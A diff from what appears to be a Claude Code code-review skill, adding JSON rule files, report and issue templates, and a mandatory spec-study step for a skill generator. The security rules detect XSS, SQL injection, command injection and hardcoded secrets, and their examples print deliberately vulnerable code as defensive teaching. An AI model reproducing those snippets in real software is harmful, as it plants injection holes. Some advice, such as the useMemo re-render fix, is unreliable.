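A minimal structural validator for this schema might look like the following sketch (it checks only the required fields; the function name is illustrative):

```javascript
// Sketch: verify the required fields of a rule file against
// the schema above and collect human-readable errors.
const SEVERITIES = ['critical', 'high', 'medium', 'low'];

function validateRuleFile(ruleFile) {
  const errors = [];
  if (typeof ruleFile.dimension !== 'string') errors.push('missing dimension');
  if (typeof ruleFile.prefix !== 'string' || ruleFile.prefix.length > 4) {
    errors.push('prefix must be a string of at most 4 chars');
  }
  for (const rule of ruleFile.rules || []) {
    if (!rule.id) errors.push('rule missing id');
    if (!SEVERITIES.includes(rule.severity)) {
      errors.push(`rule ${rule.id}: invalid severity "${rule.severity}"`);
    }
  }
  return errors;
}
```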
## Dimension Summary
| Dimension | Prefix | Rules | Focus Areas |
|-----------|--------|-------|-------------|
| Correctness | CORR | 5 | Null checks, error handling, type safety |
| Security | SEC | 5 | XSS, injection, secrets, crypto |
| Performance | PERF | 5 | Complexity, I/O, memory leaks |
| Readability | READ | 5 | Naming, length, nesting, magic values |
| Testing | TEST | 5 | Assertions, coverage, mock quality |
| Architecture | ARCH | 5 | Dependencies, layering, coupling |
## Severity Levels
| Severity | Description | Action |
|----------|-------------|--------|
| **critical** | Security vulnerability or data loss risk | Must fix before release |
| **high** | Bug or significant quality issue | Fix in current sprint |
| **medium** | Code smell or maintainability concern | Plan to address |
| **low** | Style or minor improvement | Address when convenient |
## Pattern Types
### regex
Standard regular expression pattern. Supports flags via `caseInsensitive`.
```json
{
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
"patternType": "regex"
}
```
### includes
Simple substring match. Faster than regex for literal strings.
```json
{
"pattern": "innerHTML",
"patternType": "includes"
}
```
### ast (Future)
AST-based detection for complex structural patterns.
```json
{
"pattern": "function[params>5]",
"patternType": "ast"
}
```
## Usage in Code
```javascript
// Load rules
const fs = require('fs');
const rules = JSON.parse(fs.readFileSync('correctness-rules.json', 'utf8'));
// Apply rules
const findings = [];
let counter = 1;
for (const rule of rules.rules) {
  const matches = detectByPattern(content, rule.pattern, rule.patternType);
  for (const match of matches) {
    // Skip matches whose surrounding context hits a negative pattern
    if (rule.negativePatterns?.some(np => match.context.includes(np))) {
      continue;
    }
    findings.push({
      id: `${rules.prefix}-${String(counter++).padStart(3, '0')}`,
      severity: rule.severity,
      category: rule.category,
      description: rule.description,
      recommendation: rule.recommendation,
      fixExample: rule.fixExample
    });
  }
}
```
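The snippet above calls `detectByPattern()`, which is not defined in this index. A minimal sketch covering the `regex` and `includes` pattern types (`ast` is future work; the returned `line`/`context` shape is an assumption to satisfy the negative-pattern check above):

```javascript
// Sketch: line-by-line pattern detection for the "regex" and
// "includes" pattern types described above.
function detectByPattern(content, pattern, patternType, caseInsensitive = false) {
  const matches = [];
  const lines = content.split('\n');
  if (patternType === 'regex') {
    const re = new RegExp(pattern, caseInsensitive ? 'i' : '');
    lines.forEach((line, i) => {
      if (re.test(line)) matches.push({ line: i + 1, context: line });
    });
  } else if (patternType === 'includes') {
    lines.forEach((line, i) => {
      if (line.includes(pattern)) matches.push({ line: i + 1, context: line });
    });
  }
  return matches;
}
```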
## Adding New Rules
1. Identify the appropriate dimension
2. Create rule with unique `id` within dimension
3. Choose appropriate `patternType`
4. Provide clear `description` and `recommendation`
5. Include practical `fixExample`
6. Test against sample code
## Rule Maintenance
- Review rules quarterly for relevance
- Update patterns as language/framework evolves
- Track false positive rates
- Collect feedback from users


@@ -0,0 +1,59 @@
{
"dimension": "performance",
"prefix": "PERF",
"description": "Rules for detecting performance issues including inefficient algorithms, memory leaks, and resource waste",
"rules": [
{
"id": "nested-loops",
"category": "algorithm-complexity",
"severity": "medium",
"pattern": "for\\s*\\([^)]+\\)\\s*\\{[^}]*for\\s*\\([^)]+\\)|forEach\\s*\\([^)]+\\)\\s*\\{[^}]*forEach",
"patternType": "regex",
"description": "Nested loops may indicate O(n^2) or worse complexity. Consider if this can be optimized",
"recommendation": "Use Map/Set for O(1) lookups, break early when possible, or restructure the algorithm",
"fixExample": "// Before - O(n^2)\nfor (const a of listA) {\n for (const b of listB) {\n if (a.id === b.id) { ... }\n }\n}\n\n// After - O(n)\nconst bMap = new Map(listB.map(b => [b.id, b]));\nfor (const a of listA) {\n const b = bMap.get(a.id);\n if (b) { ... }\n}"
},
{
"id": "array-in-loop",
"category": "inefficient-operation",
"severity": "high",
"pattern": "\\.includes\\s*\\(|indexOf\\s*\\(|find\\s*\\(",
"patternType": "includes",
"contextPattern": "for|while|forEach|map|filter|reduce",
"description": "Array search methods inside loops cause O(n*m) complexity. Consider using Set or Map",
"recommendation": "Convert array to Set before the loop for O(1) lookups",
"fixExample": "// Before - O(n*m)\nfor (const item of items) {\n if (existingIds.includes(item.id)) { ... }\n}\n\n// After - O(n)\nconst idSet = new Set(existingIds);\nfor (const item of items) {\n if (idSet.has(item.id)) { ... }\n}"
},
{
"id": "synchronous-io",
"category": "io-efficiency",
"severity": "high",
"pattern": "readFileSync|writeFileSync|execSync|spawnSync",
"patternType": "includes",
"description": "Synchronous I/O blocks the event loop and degrades application responsiveness",
"recommendation": "Use async versions (readFile, writeFile) or Promise-based APIs",
"fixExample": "// Before\nconst data = fs.readFileSync(path);\n\n// After\nconst data = await fs.promises.readFile(path);\n// or\nfs.readFile(path, (err, data) => { ... });"
},
{
"id": "memory-leak-closure",
"category": "memory-leak",
"severity": "high",
"pattern": "addEventListener\\s*\\(|setInterval\\s*\\(|setTimeout\\s*\\(",
"patternType": "regex",
"negativePatterns": ["removeEventListener", "clearInterval", "clearTimeout"],
"description": "Event listeners and timers without cleanup can cause memory leaks",
"recommendation": "Always remove event listeners and clear timers in cleanup functions (componentWillUnmount, useEffect cleanup)",
"fixExample": "// Before\nuseEffect(() => {\n window.addEventListener('resize', handler);\n}, []);\n\n// After\nuseEffect(() => {\n window.addEventListener('resize', handler);\n return () => window.removeEventListener('resize', handler);\n}, []);"
},
{
"id": "unnecessary-rerender",
"category": "react-performance",
"severity": "medium",
"pattern": "useState\\s*\\(\\s*\\{|useState\\s*\\(\\s*\\[",
"patternType": "regex",
"description": "Creating new object/array references in useState can cause unnecessary re-renders",
"recommendation": "Use useMemo for computed values, useCallback for functions, or consider state management libraries",
"fixExample": "// Before - new object every render\nconst [config] = useState({ theme: 'dark' });\n\n// After - stable reference\nconst defaultConfig = useMemo(() => ({ theme: 'dark' }), []);\nconst [config] = useState(defaultConfig);"
}
]
}


@@ -0,0 +1,60 @@
{
"dimension": "readability",
"prefix": "READ",
"description": "Rules for detecting code readability issues including naming, complexity, and documentation",
"rules": [
{
"id": "long-function",
"category": "function-length",
"severity": "medium",
"pattern": "function\\s+\\w+\\s*\\([^)]*\\)\\s*\\{|=>\\s*\\{",
"patternType": "regex",
"lineThreshold": 50,
"description": "Functions longer than 50 lines are difficult to understand and maintain",
"recommendation": "Break down into smaller, focused functions. Each function should do one thing well",
"fixExample": "// Before - 100 line function\nfunction processData(data) {\n // validation\n // transformation\n // calculation\n // formatting\n // output\n}\n\n// After - composed functions\nfunction processData(data) {\n const validated = validateData(data);\n const transformed = transformData(validated);\n return formatOutput(calculateResults(transformed));\n}"
},
{
"id": "single-letter-variable",
"category": "naming",
"severity": "low",
"pattern": "(?:const|let|var)\\s+[a-z]\\s*=",
"patternType": "regex",
"negativePatterns": ["for\\s*\\(", "\\[\\w,\\s*\\w\\]", "catch\\s*\\(e\\)"],
"description": "Single letter variable names reduce code readability except in specific contexts (loop counters, catch)",
"recommendation": "Use descriptive names that convey the variable's purpose",
"fixExample": "// Before\nconst d = getData();\nconst r = d.map(x => x.value);\n\n// After\nconst userData = getData();\nconst userValues = userData.map(user => user.value);"
},
{
"id": "deep-nesting",
"category": "complexity",
"severity": "high",
"pattern": "\\{[^}]*\\{[^}]*\\{[^}]*\\{",
"patternType": "regex",
"description": "Deeply nested code (4+ levels) is hard to follow and maintain",
"recommendation": "Use early returns, extract functions, or flatten conditionals",
"fixExample": "// Before\nif (user) {\n if (user.permissions) {\n if (user.permissions.canEdit) {\n if (document.isEditable) {\n // do work\n }\n }\n }\n}\n\n// After\nif (!user?.permissions?.canEdit) return;\nif (!document.isEditable) return;\n// do work"
},
{
"id": "magic-number",
"category": "magic-value",
"severity": "low",
"pattern": "[^\\d]\\d{2,}[^\\d]|setTimeout\\s*\\([^,]+,\\s*\\d{4,}\\)",
"patternType": "regex",
"negativePatterns": ["const", "let", "enum", "0x", "100", "1000"],
"description": "Magic numbers without explanation make code hard to understand",
"recommendation": "Extract magic numbers into named constants with descriptive names",
"fixExample": "// Before\nif (status === 403) { ... }\nsetTimeout(callback, 86400000);\n\n// After\nconst HTTP_FORBIDDEN = 403;\nconst ONE_DAY_MS = 24 * 60 * 60 * 1000;\nif (status === HTTP_FORBIDDEN) { ... }\nsetTimeout(callback, ONE_DAY_MS);"
},
{
"id": "commented-code",
"category": "dead-code",
"severity": "low",
"pattern": "//\\s*(const|let|var|function|if|for|while|return)\\s+",
"patternType": "regex",
"description": "Commented-out code adds noise and should be removed. Use version control for history",
"recommendation": "Remove commented code. If needed for reference, add a comment explaining why with a link to relevant commit/issue",
"fixExample": "// Before\n// function oldImplementation() { ... }\n// const legacyConfig = {...};\n\n// After\n// See PR #123 for previous implementation\n// removed 2024-01-01"
}
]
}


@@ -0,0 +1,58 @@
{
"dimension": "security",
"prefix": "SEC",
"description": "Rules for detecting security vulnerabilities including XSS, injection, and credential exposure",
"rules": [
{
"id": "xss-innerHTML",
"category": "xss-risk",
"severity": "critical",
"pattern": "innerHTML\\s*=|dangerouslySetInnerHTML",
"patternType": "includes",
"description": "Direct HTML injection via innerHTML or dangerouslySetInnerHTML can lead to XSS vulnerabilities",
"recommendation": "Use textContent for plain text, or sanitize HTML input using a library like DOMPurify before injection",
"fixExample": "// Before\nelement.innerHTML = userInput;\n<div dangerouslySetInnerHTML={{__html: data}} />\n\n// After\nelement.textContent = userInput;\n// or\nimport DOMPurify from 'dompurify';\nelement.innerHTML = DOMPurify.sanitize(userInput);"
},
{
"id": "hardcoded-secret",
"category": "hardcoded-secret",
"severity": "critical",
"pattern": "(?:password|secret|api[_-]?key|token|credential)\\s*[=:]\\s*['\"][^'\"]{8,}['\"]",
"patternType": "regex",
"caseInsensitive": true,
"description": "Hardcoded credentials detected in source code. This is a security risk if code is exposed",
"recommendation": "Use environment variables, secret management services, or configuration files excluded from version control",
"fixExample": "// Before\nconst apiKey = 'sk-1234567890abcdef';\n\n// After\nconst apiKey = process.env.API_KEY;\n// or\nconst apiKey = await getSecretFromVault('api-key');"
},
{
"id": "sql-injection",
"category": "injection",
"severity": "critical",
"pattern": "query\\s*\\(\\s*[`'\"].*\\$\\{|execute\\s*\\(\\s*[`'\"].*\\+",
"patternType": "regex",
"description": "String concatenation or template literals in SQL queries can lead to SQL injection",
"recommendation": "Use parameterized queries or prepared statements with placeholders",
"fixExample": "// Before\ndb.query(`SELECT * FROM users WHERE id = ${userId}`);\n\n// After\ndb.query('SELECT * FROM users WHERE id = ?', [userId]);\n// or\ndb.query('SELECT * FROM users WHERE id = $1', [userId]);"
},
{
"id": "command-injection",
"category": "injection",
"severity": "critical",
"pattern": "exec\\s*\\(|execSync\\s*\\(|spawn\\s*\\([^,]*\\+|child_process",
"patternType": "regex",
"description": "Command execution with user input can lead to command injection attacks",
"recommendation": "Validate and sanitize input, use parameterized commands, or avoid shell execution entirely",
"fixExample": "// Before\nexec(`ls ${userInput}`);\n\n// After\nexecFile('ls', [sanitizedInput], options);\n// or use spawn with {shell: false}"
},
{
"id": "insecure-random",
"category": "cryptography",
"severity": "high",
"pattern": "Math\\.random\\(\\)",
"patternType": "includes",
"description": "Math.random() is not cryptographically secure and should not be used for security-sensitive operations",
"recommendation": "Use crypto.randomBytes() or crypto.getRandomValues() for security-critical random generation",
"fixExample": "// Before\nconst token = Math.random().toString(36);\n\n// After\nimport crypto from 'crypto';\nconst token = crypto.randomBytes(32).toString('hex');"
}
]
}
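The rule files above share a small matching schema: `pattern`, `patternType` (`regex` or `includes`), optional `negativePatterns`, and `caseInsensitive`. The engine that consumes these rules is not shown here; the sketch below is an assumption about its semantics — it treats `includes` patterns as `|`-separated substring alternatives and exempts any line that matches a negative pattern.

```javascript
// Sketch of a single-line rule matcher for the schema above. The real
// engine's semantics are an assumption: "includes" is treated as
// |-separated substring alternatives, and any negativePatterns hit
// exempts the line (e.g. loop counters, catch(e), declared constants).
function ruleMatches(rule, line) {
  const flags = rule.caseInsensitive ? 'i' : '';
  const haystack = rule.caseInsensitive ? line.toLowerCase() : line;
  const hit = rule.patternType === 'regex'
    ? new RegExp(rule.pattern, flags).test(line)
    : rule.pattern.split('|').some(p =>
        haystack.includes(rule.caseInsensitive ? p.toLowerCase() : p));
  if (!hit) return false;
  // A match on any negative pattern suppresses the finding
  return !(rule.negativePatterns || []).some(p => new RegExp(p, flags).test(line));
}
```

With the `single-letter-variable` rule, `const d = getData();` matches, while `for (let i = 0; ...)` is suppressed by its `for\s*\(` negative pattern.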


@@ -0,0 +1,59 @@
{
"dimension": "testing",
"prefix": "TEST",
"description": "Rules for detecting testing issues including coverage gaps, test quality, and mock usage",
"rules": [
{
"id": "missing-assertion",
"category": "test-quality",
"severity": "high",
"pattern": "(?:it|test)\\s*\\([^)]+,\\s*(?:async\\s*)?\\(\\)\\s*=>\\s*\\{[^}]*\\}\\s*\\)",
"patternType": "regex",
"negativePatterns": ["expect", "assert", "should", "toBe", "toEqual"],
"description": "Test case without assertions always passes and provides no value",
"recommendation": "Add assertions to verify expected behavior. Each test should have at least one meaningful assertion",
"fixExample": "// Before\nit('should process data', async () => {\n await processData(input);\n});\n\n// After\nit('should process data', async () => {\n const result = await processData(input);\n expect(result.success).toBe(true);\n expect(result.data).toHaveLength(3);\n});"
},
{
"id": "hardcoded-test-data",
"category": "test-maintainability",
"severity": "low",
"pattern": "expect\\s*\\([^)]+\\)\\.toBe\\s*\\(['\"][^'\"]{20,}['\"]\\)",
"patternType": "regex",
"description": "Long hardcoded strings in assertions are brittle and hard to maintain",
"recommendation": "Use snapshots for large outputs, or extract expected values to test fixtures",
"fixExample": "// Before\nexpect(result).toBe('very long expected string that is hard to maintain...');\n\n// After\nexpect(result).toMatchSnapshot();\n// or\nconst expected = loadFixture('expected-output.json');\nexpect(result).toEqual(expected);"
},
{
"id": "no-error-test",
"category": "coverage-gap",
"severity": "medium",
"pattern": "describe\\s*\\([^)]+",
"patternType": "regex",
"negativePatterns": ["throw", "reject", "error", "fail", "catch"],
"description": "Test suite may be missing error path testing. Error handling is critical for reliability",
"recommendation": "Add tests for error cases: invalid input, network failures, edge cases",
"fixExample": "// Add error path tests\nit('should throw on invalid input', () => {\n expect(() => processData(null)).toThrow('Invalid input');\n});\n\nit('should handle network failure', async () => {\n mockApi.mockRejectedValue(new Error('Network error'));\n await expect(fetchData()).rejects.toThrow('Network error');\n});"
},
{
"id": "test-implementation-detail",
"category": "test-quality",
"severity": "medium",
"pattern": "toHaveBeenCalledWith|toHaveBeenCalledTimes",
"patternType": "includes",
"description": "Testing implementation details (call counts, exact parameters) makes tests brittle to refactoring",
"recommendation": "Prefer testing observable behavior and outcomes over internal implementation",
"fixExample": "// Before - brittle\nexpect(mockService.process).toHaveBeenCalledTimes(3);\nexpect(mockService.process).toHaveBeenCalledWith('exact-arg');\n\n// After - behavior-focused\nexpect(result.items).toHaveLength(3);\nexpect(result.processed).toBe(true);"
},
{
"id": "skip-test",
"category": "test-coverage",
"severity": "high",
"pattern": "it\\.skip|test\\.skip|xit|xdescribe|describe\\.skip",
"patternType": "regex",
"description": "Skipped tests indicate untested code paths or broken functionality",
"recommendation": "Fix or remove skipped tests. If temporarily skipped, add TODO comment with issue reference",
"fixExample": "// Before\nit.skip('should handle edge case', () => { ... });\n\n// After - either fix it\nit('should handle edge case', () => {\n // fixed implementation\n});\n\n// Or document why skipped\n// TODO(#123): Re-enable after API migration\nit.skip('should handle edge case', () => { ... });"
}
]
}


@@ -0,0 +1,186 @@
# Issue Template
Template for recording individual review issues.
## Single Issue Template
```markdown
#### {{severity_emoji}} [{{id}}] {{category}}
- **Severity**: {{severity}}
- **Dimension**: {{dimension}}
- **File**: `{{file}}`{{#if line}}:{{line}}{{/if}}
- **Description**: {{description}}
{{#if code_snippet}}
**Offending code**:
```{{language}}
{{code_snippet}}
```
{{/if}}
**Recommendation**: {{recommendation}}
{{#if fix_example}}
**Fix example**:
```{{language}}
{{fix_example}}
```
{{/if}}
{{#if references}}
**References**:
{{#each references}}
- {{this}}
{{/each}}
{{/if}}
```
## Issue Object Schema
```typescript
interface Issue {
id: string; // e.g., "SEC-001"
severity: 'critical' | 'high' | 'medium' | 'low' | 'info';
dimension: string; // e.g., "security"
category: string; // e.g., "xss-risk"
file: string; // e.g., "src/utils/render.ts"
line?: number; // e.g., 42
column?: number; // e.g., 15
code_snippet?: string;
description: string;
recommendation: string;
fix_example?: string;
references?: string[];
}
```
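Consumers of this interface can enforce its shape at runtime. The validator below is a hypothetical helper, not something the pipeline defines — it only mirrors the interface above:

```javascript
// Hypothetical runtime check mirroring the Issue interface above;
// the pipeline itself does not ship a validator.
const SEVERITIES = ['critical', 'high', 'medium', 'low', 'info'];
const REQUIRED = ['id', 'severity', 'dimension', 'category', 'file', 'description', 'recommendation'];

function validateIssue(issue) {
  const errors = [];
  for (const field of REQUIRED) {
    if (typeof issue[field] !== 'string' || issue[field] === '') {
      errors.push(`missing or empty field: ${field}`);
    }
  }
  if (typeof issue.severity === 'string' && !SEVERITIES.includes(issue.severity)) {
    errors.push(`invalid severity: ${issue.severity}`);
  }
  if (issue.line !== undefined && !Number.isInteger(issue.line)) {
    errors.push('line must be an integer');
  }
  return errors; // empty array means the issue is well-formed
}
```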
## ID Generation
```javascript
function generateIssueId(dimension, counter) {
const prefixes = {
correctness: 'CORR',
readability: 'READ',
performance: 'PERF',
security: 'SEC',
testing: 'TEST',
architecture: 'ARCH'
};
const prefix = prefixes[dimension] || 'MISC';
const number = String(counter).padStart(3, '0');
return `${prefix}-${number}`;
}
```
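IDs are typically assigned per dimension so that each prefix restarts at 001. The per-dimension counter policy below is an assumption, and `generateIssueId` is redeclared so the sketch runs standalone:

```javascript
// Same generator as above, redeclared so this sketch is self-contained.
function generateIssueId(dimension, counter) {
  const prefixes = { correctness: 'CORR', readability: 'READ', performance: 'PERF',
    security: 'SEC', testing: 'TEST', architecture: 'ARCH' };
  return `${prefixes[dimension] || 'MISC'}-${String(counter).padStart(3, '0')}`;
}

// Assumed policy: each dimension keeps its own counter, so IDs read
// SEC-001, SEC-002, CORR-001, ... in finding order.
function assignIds(findings) {
  const counters = {};
  return findings.map(f => {
    counters[f.dimension] = (counters[f.dimension] || 0) + 1;
    return { ...f, id: generateIssueId(f.dimension, counters[f.dimension]) };
  });
}
```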
## Severity Emojis
```javascript
const SEVERITY_EMOJI = {
critical: '🔴',
high: '🟠',
medium: '🟡',
low: '🔵',
info: '⚪'
};
```
## Issue Categories by Dimension
### Correctness
- `null-check` - Missing null checks
- `boundary` - Unhandled boundary conditions
- `error-handling` - Improper error handling
- `type-safety` - Type-safety issues
- `logic-error` - Logic errors
- `resource-leak` - Resource leaks
### Security
- `injection` - Injection risk
- `xss` - Cross-site scripting
- `hardcoded-secret` - Hardcoded secrets
- `auth` - Authentication/authorization flaws
- `sensitive-data` - Sensitive-data exposure
### Performance
- `complexity` - Complexity problems
- `n+1-query` - N+1 queries
- `memory-leak` - Memory leaks
- `blocking-io` - Blocking I/O
- `inefficient-algorithm` - Inefficient algorithms
### Readability
- `naming` - Naming problems
- `function-length` - Overlong functions
- `nesting-depth` - Excessive nesting
- `comments` - Comment problems
- `duplication` - Code duplication
### Testing
- `coverage` - Insufficient coverage
- `boundary-test` - Missing boundary tests
- `test-isolation` - Tests not isolated
- `flaky-test` - Flaky tests
### Architecture
- `layer-violation` - Layering violations
- `circular-dependency` - Circular dependencies
- `coupling` - Excessive coupling
- `srp-violation` - Single-responsibility violations
## Example Issues
### Critical Security Issue
```json
{
"id": "SEC-001",
"severity": "critical",
"dimension": "security",
"category": "xss",
"file": "src/components/Comment.tsx",
"line": 25,
"code_snippet": "element.innerHTML = userComment;",
"description": "Inserting user input directly via innerHTML creates an XSS attack risk",
"recommendation": "Use textContent, or HTML-escape/sanitize the user input before injection",
"fix_example": "element.textContent = userComment;\n// or\nelement.innerHTML = DOMPurify.sanitize(userComment);",
"references": [
"https://owasp.org/www-community/xss-filter-evasion-cheatsheet"
]
}
```
### High Correctness Issue
```json
{
"id": "CORR-003",
"severity": "high",
"dimension": "correctness",
"category": "error-handling",
"file": "src/services/api.ts",
"line": 42,
"code_snippet": "try {\n await fetchData();\n} catch (e) {}",
"description": "An empty catch block silently swallows errors, making problems hard to detect and debug",
"recommendation": "Log the error or rethrow the exception",
"fix_example": "try {\n await fetchData();\n} catch (e) {\n console.error('Failed to fetch data:', e);\n throw e;\n}"
}
```
### Medium Readability Issue
```json
{
"id": "READ-007",
"severity": "medium",
"dimension": "readability",
"category": "function-length",
"file": "src/utils/processor.ts",
"line": 15,
"description": "Function processData is 150 lines long, exceeding the recommended 50-line limit, and is hard to understand and maintain",
"recommendation": "Split the function into smaller functions, each with a single responsibility",
"fix_example": "// Split into:\nfunction validateInput(data) { ... }\nfunction transformData(data) { ... }\nfunction saveData(data) { ... }"
}
```


@@ -0,0 +1,173 @@
# Review Report Template
Template for the code review report.
## Template Structure
```markdown
# Code Review Report
## Review Overview
| Item | Value |
|------|------|
| Target path | `{{target_path}}` |
| File count | {{file_count}} |
| Lines of code | {{total_lines}} |
| Primary language | {{language}} |
| Framework | {{framework}} |
| Review duration | {{review_duration}} |
## Issue Statistics
| Severity | Count |
|----------|------|
| 🔴 Critical | {{critical_count}} |
| 🟠 High | {{high_count}} |
| 🟡 Medium | {{medium_count}} |
| 🔵 Low | {{low_count}} |
| ⚪ Info | {{info_count}} |
| **Total** | **{{total_issues}}** |
### By Dimension
| Dimension | Issues |
|------|--------|
| Correctness | {{correctness_count}} |
| Security | {{security_count}} |
| Performance | {{performance_count}} |
| Readability | {{readability_count}} |
| Testing | {{testing_count}} |
| Architecture | {{architecture_count}} |
---
## High-Risk Areas
{{#if risk_areas}}
| File | Reason | Priority |
|------|------|--------|
{{#each risk_areas}}
| `{{this.file}}` | {{this.reason}} | {{this.priority}} |
{{/each}}
{{else}}
No obvious high-risk areas were found.
{{/if}}
---
## Issue Details
{{#each dimensions}}
### {{this.name}}
{{#each this.findings}}
#### {{severity_emoji this.severity}} [{{this.id}}] {{this.category}}
- **Severity**: {{this.severity}}
- **File**: `{{this.file}}`{{#if this.line}}:{{this.line}}{{/if}}
- **Description**: {{this.description}}
{{#if this.code_snippet}}
```
{{this.code_snippet}}
```
{{/if}}
**Recommendation**: {{this.recommendation}}
{{#if this.fix_example}}
**Fix example**:
```
{{this.fix_example}}
```
{{/if}}
---
{{/each}}
{{/each}}
## Review Recommendations
### Must Fix
{{must_fix_summary}}
### Should Fix
{{should_fix_summary}}
### Nice to Have
{{nice_to_have_summary}}
---
*Report generated at: {{generated_at}}*
```
## Variable Definitions
| Variable | Type | Source |
|----------|------|--------|
| `{{target_path}}` | string | state.context.target_path |
| `{{file_count}}` | number | state.context.file_count |
| `{{total_lines}}` | number | state.context.total_lines |
| `{{language}}` | string | state.context.language |
| `{{framework}}` | string | state.context.framework |
| `{{review_duration}}` | string | Formatted duration |
| `{{critical_count}}` | number | Count of critical findings |
| `{{high_count}}` | number | Count of high findings |
| `{{medium_count}}` | number | Count of medium findings |
| `{{low_count}}` | number | Count of low findings |
| `{{info_count}}` | number | Count of info findings |
| `{{total_issues}}` | number | Total findings |
| `{{risk_areas}}` | array | state.scan_summary.risk_areas |
| `{{dimensions}}` | array | Grouped findings by dimension |
| `{{generated_at}}` | string | ISO timestamp |
## Helper Functions
```javascript
function severity_emoji(severity) {
const emojis = {
critical: '🔴',
high: '🟠',
medium: '🟡',
low: '🔵',
info: '⚪'
};
return emojis[severity] || '⚪';
}
function formatDuration(ms) {
const minutes = Math.floor(ms / 60000);
const seconds = Math.floor((ms % 60000) / 1000);
return `${minutes}m ${seconds}s`;
}
function generateMustFixSummary(findings) {
const critical = findings.filter(f => f.severity === 'critical');
const high = findings.filter(f => f.severity === 'high');
if (critical.length + high.length === 0) {
return 'No issues requiring immediate fixes were found.';
}
return `Found ${critical.length} critical and ${high.length} high-priority issues; fix them before merging.`;
}
```
## Usage Example
```javascript
const report = generateReport({
context: state.context,
summary: state.summary,
findings: state.findings,
scanSummary: state.scan_summary
});
Write(`${workDir}/review-report.md`, report);
```


@@ -15,6 +15,9 @@ Meta-skill for creating new Claude Code skills with configurable execution modes
│ Skill Generator Architecture │
├─────────────────────────────────────────────────────────────────┤
│ │
│  ⚠️ Phase 0: Specification → Read and understand the design spec (mandatory) │
│              Study            SKILL-DESIGN-SPEC.md + templates  │
│ ↓ │
│ Phase 1: Requirements → skill-config.json │
│ Discovery (name, type, mode, agents) │
│ ↓ │
@@ -82,10 +85,63 @@ Phase 01 → Phase 02 → Phase 03 → ... → Phase N
3. **Spec compliance**: Strictly follow `_shared/SKILL-DESIGN-SPEC.md`
4. **Extensibility**: Generated skills are easy to extend and modify
---
## ⚠️ Mandatory Prerequisites
> **⛔ Do not skip**: Before performing any generation, you **must** read the following documents in full. Generating without studying the specs will produce output that fails the quality standards.
### Core Specs (Required)
| Document | Purpose | Priority |
|----------|---------|----------|
| [../_shared/SKILL-DESIGN-SPEC.md](../_shared/SKILL-DESIGN-SPEC.md) | Universal design spec - defines structure, naming, and quality standards for all skills | **P0 - Highest** |
### Templates (Read Before Generating)
| Document | Purpose |
|----------|---------|
| [templates/skill-md.md](templates/skill-md.md) | SKILL.md entry-file template |
| [templates/sequential-phase.md](templates/sequential-phase.md) | Sequential phase template |
| [templates/autonomous-orchestrator.md](templates/autonomous-orchestrator.md) | Autonomous orchestrator template |
| [templates/autonomous-action.md](templates/autonomous-action.md) | Autonomous action template |
| [templates/code-analysis-action.md](templates/code-analysis-action.md) | Code-analysis action template |
| [templates/llm-action.md](templates/llm-action.md) | LLM action template |
| [templates/script-bash.md](templates/script-bash.md) | Bash script template |
| [templates/script-python.md](templates/script-python.md) | Python script template |
### Spec Documents (Read As Needed)
| Document | Purpose |
|----------|---------|
| [specs/execution-modes.md](specs/execution-modes.md) | Execution-mode spec |
| [specs/skill-requirements.md](specs/skill-requirements.md) | Skill requirements spec |
| [specs/cli-integration.md](specs/cli-integration.md) | CLI integration spec |
| [specs/scripting-integration.md](specs/scripting-integration.md) | Scripting integration spec |
### Phase Execution Guides (Reference During Execution)
| Document | Purpose |
|----------|---------|
| [phases/01-requirements-discovery.md](phases/01-requirements-discovery.md) | Gather skill requirements |
| [phases/02-structure-generation.md](phases/02-structure-generation.md) | Generate the directory structure |
| [phases/03-phase-generation.md](phases/03-phase-generation.md) | Generate phase files |
| [phases/04-specs-templates.md](phases/04-specs-templates.md) | Generate specs and templates |
| [phases/05-validation.md](phases/05-validation.md) | Validation and documentation |
---
## Execution Flow
```
┌─────────────────────────────────────────────────────────────────┐
│  ⚠️ Phase 0: Specification Study (mandatory - do not skip)      │
│    → Read: ../_shared/SKILL-DESIGN-SPEC.md (universal design spec) │
│    → Read: templates/*.md (all relevant template files)         │
│    → Understand: skill structure spec, naming conventions, quality standards │
│    → Output: internalized spec requirements so later generation meets the standards │
│    ⛔ Do not enter Phase 1 until Phase 0 is complete            │
├─────────────────────────────────────────────────────────────────┤
│  Phase 1: Requirements Discovery                                │
│    → AskUserQuestion: skill name, goal, execution mode          │
│    → Output: skill-config.json                                  │
@@ -168,20 +224,3 @@ if (config.execution_mode === 'autonomous') {
├── orchestrator-base.md     # Orchestrator template
└── action-base.md           # Action template
```
## Reference Documents
| Document | Purpose |
|----------|---------|
| [phases/01-requirements-discovery.md](phases/01-requirements-discovery.md) | Gather skill requirements |
| [phases/02-structure-generation.md](phases/02-structure-generation.md) | Generate the directory structure |
| [phases/03-phase-generation.md](phases/03-phase-generation.md) | Generate phase files |
| [phases/04-specs-templates.md](phases/04-specs-templates.md) | Generate specs and templates |
| [phases/05-validation.md](phases/05-validation.md) | Validation and documentation |
| [specs/execution-modes.md](specs/execution-modes.md) | Execution-mode spec |
| [specs/skill-requirements.md](specs/skill-requirements.md) | Skill requirements spec |
| [templates/skill-md.md](templates/skill-md.md) | SKILL.md template |
| [templates/sequential-phase.md](templates/sequential-phase.md) | Sequential phase template |
| [templates/autonomous-orchestrator.md](templates/autonomous-orchestrator.md) | Autonomous orchestrator template |
| [templates/autonomous-action.md](templates/autonomous-action.md) | Autonomous action template |
| [../_shared/SKILL-DESIGN-SPEC.md](../_shared/SKILL-DESIGN-SPEC.md) | Universal design spec |


@@ -2,6 +2,16 @@
Template for the autonomous-mode orchestrator.
## ⚠️ Important Note
> **Phase 0 is a mandatory prerequisite**: the orchestrator must complete the Phase 0 spec study before starting its execution loop.
>
> When generating an orchestrator, ensure that:
> 1. SKILL.md includes the Phase 0 spec-study step
> 2. The orchestrator verifies the specs have been read before starting
> 3. Every action file references the relevant spec documents
> 4. Phase 0 precedes the orchestrator in the Architecture Overview
## Template Structure
```markdown


@@ -2,6 +2,15 @@
Template for sequential-mode phase files.
## ⚠️ Important Note
> **Phase 0 is a mandatory prerequisite**: the Phase 0 spec study must be completed before implementing any phase (1, 2, 3, ...).
>
> When generating sequential phases, ensure that:
> 1. SKILL.md includes the Phase 0 spec-study step
> 2. Every phase file references the relevant spec documents
> 3. The execution flow explicitly marks Phase 0 as a prerequisite that must not be skipped
## Template Structure
```markdown


@@ -36,6 +36,16 @@ allowed-tools: {{allowed_tools}}
{{design_principles}}
---
## ⚠️ Mandatory Prerequisites
